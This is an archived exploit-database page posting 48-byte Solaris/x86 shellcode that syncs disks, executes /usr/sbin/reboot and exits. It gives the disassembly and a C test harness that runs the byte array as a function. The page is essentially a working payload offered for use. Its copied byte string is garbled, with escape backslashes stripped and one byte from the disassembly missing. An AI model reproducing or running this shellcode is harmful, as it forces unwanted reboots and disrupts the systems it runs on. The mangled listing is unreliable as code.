Home / os / win7

solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes

Posted on 10 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>solaris/x86 - Sync() &amp; reboot() &amp; exit(0) - 48 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================
Solaris/x86 - Sync() &amp; reboot() &amp; exit(0) - 48 bytes
====================================================


/*
 Title:   Solaris/x86 - Sync() &amp; reboot() &amp; exit(0) - 48 bytes
 Author:  Jonathan Salwan &lt;submit AT shell-storm.org&gt;
 Web:     http://www.shell-storm.org
 Twitter: http://twitter.com/shell_storm 

 ! Database of shellcodes: http://www.shell-storm.org/shellcode/

 Date:    2010-06-07
 Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              b0 24              movb   $0x24,%al
    0x8048078:              cd 91              int    $0x91
    0x804807a:              31 c0              xorl   %eax,%eax
    0x804807c:              50                 pushl  %eax
    0x804807d:              68 62 6f 6f 74     pushl  $0x746f6f62
    0x8048082:              68 6e 2f 72 65     pushl  $0x65722f6e
    0x8048087:              68 2f 73 62 69     pushl  $0x6962732f
    0x804808c:              68 2f 75 73 72     pushl  $0x7273752f
    0x8048091:              89 e3              movl   %esp,%ebx
    0x8048093:              50                 pushl  %eax
    0x8048094:              53                 pushl  %ebx
    0x8048095:              89 e1              movl   %esp,%ecx
    0x8048097:              50                 pushl  %eax
    0x8048098:              51                 pushl  %ecx
    0x8048099:              53                 pushl  %ebx
    0x804809a:              b0 0b              movb   $0xb,%al
    0x804809c:              50                 pushl  %eax
    0x804809d:              cd 91              int    $0x91
    0x804809f:              31 db              xorl   %ebx,%ebx
    0x80480a1:              b0 01              movb   $0x1,%al
    0x80480a3:              cd 91              int    $0x91


*/

#include &lt;stdio.h&gt;

char sc[] = &quot;x31xc0xb0x24xcdx91x31xc0x50x68&quot;
            &quot;x62x6fx6fx74x68x6ex2fx72x65x68&quot;
            &quot;x2fx73x62x69x68x2fx75x73x72x89&quot;
            &quot;xe3x50x53x89xe1x50x51x53xb0x0b&quot;
            &quot;x50xcdx91x31xdbxb0xcdx91&quot;;


int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(sc));
        (*(void(*)()) sc)();

return 0;
}



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :